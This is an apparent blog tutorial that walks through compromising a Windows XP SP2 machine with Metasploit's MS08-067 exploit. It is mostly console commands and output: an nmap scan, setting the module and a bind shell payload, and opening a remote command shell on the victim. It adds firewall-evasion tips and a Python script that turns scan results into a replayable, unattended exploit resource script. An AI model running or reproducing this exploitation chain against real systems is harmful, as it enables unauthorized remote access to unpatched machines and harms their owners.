Sunday, January 9, 2011

Hacking With Basic Metasploit Commands


First we try a manual test with the Metasploit console (msfconsole). The test is run against a single Windows XP SP2 machine, attempting the MS08-067 exploit, a vulnerability in the Microsoft Windows Server service reached over SMB on port 445. It has most likely been patched by now, but plenty of people still seem to run pirated XP SP2 without updates.
Running Metasploit on Windows or on Linux should be much the same; I tried it on Ubuntu 9.04.

Blackmygo@ubuntu:~$ msfconsole
|\/| |¯ ¯|¯ /¯\ |¯  |¯| |  |¯| | ¯|¯ 
|  | |¯  |  |¯|  ¯| |¯  |_ |_| |  |  
      ¯          ¯                 
        =[ msf  v3.3 dev
        =[ 359 exploits - 233 payloads
        =[ 20 encoders 7 nops
        =[ 132 aux
msf > version
Framework : 3.3 dev.6055
Console     : 3.3 dev.6344
msf >

OK, to start, just type help to see the available commands:

msf > help

      Core Commands
      =============

      Command       Description
      -------       -----------
      ?             Help menu
      back          Move back from the current context
      banner        Display an awesome metasploit banner
      cd            Change the current working directory
      connect       Communicate with a host
      exit          Exit the console
      help          Help menu
      info          Displays information about one or more module
      irb           Drop into irb scripting mode
      jobs          Displays and manages jobs
      load          Load a framework plugin
      loadpath      Searches for and loads modules from a path
      quit          Exit the console
      resource      Run the commands stored in a file
      route         Route traffic through a session
      save          Saves the active datastores
      search        Searches module names and descriptions
      sessions      Dump session listings and display information about sessions
      set           Sets a variable to a value
      setg          Sets a global variable to a value
      show          Displays modules of a given type, or all modules
      sleep         Do nothing for the specified number of seconds
      unload        Unload a framework plugin
      unset         Unsets one or more variables
      unsetg        Unsets one or more global variables
      use           Selects a module by name
      version       Show the framework and console library version numbers

To see the list of exploits, use the command:

msf > show exploits

The output looks roughly like this (it is very long, so only part of it is shown):

windows/smb/ms05_039_pnp              Microsoft Plug and Play Service Overflow
windows/smb/ms06_025_rasmans_reg      Microsoft RRAS Service RASMAN Registry Overflow
windows/smb/ms06_025_rras             Microsoft RRAS Service Overflow
windows/smb/ms06_040_netapi           Microsoft Server Service NetpwPathCanonicalize Overflow
windows/smb/ms06_066_nwapi            Microsoft Services MS06-066 nwapi32.dll
windows/smb/ms06_066_nwwks            Microsoft Services MS06-066 nwwks.dll
windows/smb/ms08_067_netapi           Microsoft Server Service Relative Path Stac

Next we need to scan the computer we want to attack, at IP 192.168.1.2. We use nmap so we get the full picture. msfconsole passes commands it does not recognise to the system shell, so nmap can be run straight from the msf prompt:

msf > sudo nmap -v -sS -A -O 192.168.1.2

The result comes out like this:

[*] exec: sudo nmap -v -sS -A -O 192.168.1.2
[sudo] password for test:
Starting Nmap 4.62 ( http://nmap.org ) at 2010-01-31 23:50 CIT
Initiating ARP Ping Scan at 23:50
Scanning 192.168.1.2 [1 port]
Host 192.168.1.2 appears to be up ... good.
Interesting ports on 192.168.1.2:
Not shown: 1712 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 00:1E:8C:67:59:F9 (Asustek Computer)
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows 2000 SP4, or Windows XP SP2 or SP3
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows

From the scan we know the OS is probably Windows XP (nmap's guess is Windows 2000 SP4 or XP SP2/SP3) and that port 445 is open, so the SMB service is reachable. Let's try this machine with the exploit windows/smb/ms08_067_netapi.

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

Look at this exploit's options by typing show options:

msf exploit(ms08_067_netapi) > show options

Module options:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)  

Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting

From the options above, we first need to set RHOST (the target computer) by typing:

msf exploit(ms08_067_netapi) > set rhost 192.168.1.2
rhost => 192.168.1.2

For RPORT we don't need to change anything, because this vulnerability is in the SMB service that listens on port 445 (only change it if the target's SMB is on a different port). SMBPIPE can stay at BROWSER; if the exploit cannot open that named pipe, try set SMBPIPE SRVSVC, the other value the option lists. The exploit target is the target computer's OS; in this step we use 0, automatic targeting, which lets the module fingerprint the host and pick a target itself. To see which target OSes are available, type:

msf exploit(ms08_067_netapi) > show targets

Exploit targets:
   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows XP SP2 English (NX)
   4   Windows XP SP3 English (NX)

Now we choose the payload to use. In this step I want to use a bind TCP shell (a command prompt on the target that listens on the target's LPORT, 4444 by default, which we then connect to). A bind shell only works if we can reach that port on the target; if a host firewall blocks inbound connections, use a reverse shell such as windows/shell_reverse_tcp and set LHOST to our own address instead:

msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp

To see which payloads Metasploit has that are compatible with this exploit, use the command (the list is long; only the first few entries are shown):

msf exploit(ms08_067_netapi) > show payloads

Compatible payloads
===================
   Name                                            Description
   ----                                            -----------
   generic/debug_trap                Generic x86 Debug Trap
   generic/debug_trap/bind_ipv6_tcp  Generic x86 Debug Trap, Bind TCP Stager (IPv6)
   generic/debug_trap/bind_nonx_tcp  Generic x86 Debug Trap, Bind TCP Stager (No NX Support)
   generic/debug_trap/bind_tcp       Generic x86 Debug Trap, Bind TCP Stager

Now the settings are done. To check the configuration, look at it again with show options:

msf exploit(ms08_067_netapi) > show options

Module options:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.2      yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)  

Payload options (windows/shell_bind_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST     192.168.1.2      no        The target address

Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting

Now run the exploit:

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.1.6:33270 -> 192.168.1.2:4444)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.1.2
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.254

C:\WINDOWS\system32>

Now we're on the victim's computer; from here you can run whatever commands you need. Note that this is a plain command shell: each command you type is echoed back before its output, as ipconfig is above.
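The whole procedure above (scan the host, check for SMB on 445 and a Windows 2000/XP fingerprint, use the module, set RHOST and the payload, exploit) as one added example, not code from the original post or from Metasploit: a Python script that parses the nmap output from the scan step, decides whether the host is an MS08-067 candidate, and writes the msfconsole commands typed by hand above into a resource script that `msfconsole -r` (or the `resource` command from the help listing) replays. The embedded scan text is a copy of the page's own nmap output; the output file name ms08_067.rc is an assumption.

```python
"""Triage an nmap scan and render a Metasploit resource script for MS08-067.

Added example for this post, not Metasploit's own code. It replays the
manual steps above: parse the nmap output, check for SMB on TCP/445 and a
Windows 2000/XP fingerprint, then write the msfconsole commands to a .rc
file that `msfconsole -r ms08_067.rc` (or `resource ms08_067.rc`) runs.
The output file name is an assumption.
"""
import re
from dataclasses import dataclass, field

# Sample input: a copy of the nmap output from the scan step above,
# embedded so the script runs offline.
SAMPLE_NMAP = """\
Starting Nmap 4.62 ( http://nmap.org ) at 2010-01-31 23:50 CIT
Interesting ports on 192.168.1.2:
Not shown: 1712 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 00:1E:8C:67:59:F9 (Asustek Computer)
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows 2000 SP4, or Windows XP SP2 or SP3
Network Distance: 1 hop
"""

HOST_RE = re.compile(r"^Interesting ports on (\S+):$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# Operating systems covered by the ms08_067_netapi targets shown on this page.
TARGET_OS = ("Windows 2000", "Windows XP")


@dataclass
class ScanResult:
    host: str = ""
    open_tcp: dict = field(default_factory=dict)  # port -> service name
    os_details: str = ""


def parse_nmap(text):
    """Extract host, open TCP ports and the OS guess from nmap normal output."""
    result = ScanResult()
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_RE.match(line)
        if m:
            result.host = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m and m.group(2) == "tcp" and m.group(3) == "open":
            result.open_tcp[int(m.group(1))] = m.group(4)
            continue
        if line.startswith("OS details:"):
            result.os_details = line.split(":", 1)[1].strip()
    return result


def ms08_067_candidate(scan):
    """The module needs SMB reachable on 445 and an OS it has a target for."""
    return 445 in scan.open_tcp and any(name in scan.os_details for name in TARGET_OS)


def render_rc(scan, payload="windows/shell_bind_tcp", lport=4444,
              lhost=None, smbpipe="BROWSER"):
    """Emit the commands typed by hand above, one per line, as a resource script.

    `exploit -z` returns to the prompt instead of interacting with the new
    session, so the script can be replayed unattended. A reverse payload
    (for targets whose firewall blocks inbound 4444) needs LHOST set to us.
    """
    if "reverse" in payload and not lhost:
        raise ValueError("reverse payloads need LHOST (the attacker's address)")
    lines = [
        "use windows/smb/ms08_067_netapi",
        f"set RHOST {scan.host}",
        f"set SMBPIPE {smbpipe}",   # try SRVSVC if the BROWSER pipe fails
        f"set PAYLOAD {payload}",
        f"set LPORT {lport}",
    ]
    if lhost:
        lines.append(f"set LHOST {lhost}")
    lines.append("exploit -z")
    return "\n".join(lines) + "\n"


def main(nmap_text=SAMPLE_NMAP, path="ms08_067.rc"):
    scan = parse_nmap(nmap_text)
    if not ms08_067_candidate(scan):
        print(f"{scan.host or '?'}: not an MS08-067 candidate "
              f"(445 open: {445 in scan.open_tcp}, OS: {scan.os_details!r})")
        return None
    rc = render_rc(scan)
    with open(path, "w") as fh:
        fh.write(rc)
    print(f"wrote {path} for {scan.host}; replay with: msfconsole -r {path}")
    return rc


if __name__ == "__main__":
    main()
```

Feed it a real scan with `python3 triage.py` after replacing SAMPLE_NMAP with the output of nmap run against your lab host; a host with 445 closed, or with an OS guess outside the module's target list, produces no script, which is the same decision the post makes by eye from the scan.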

That's all from me for now; I hope it's useful.
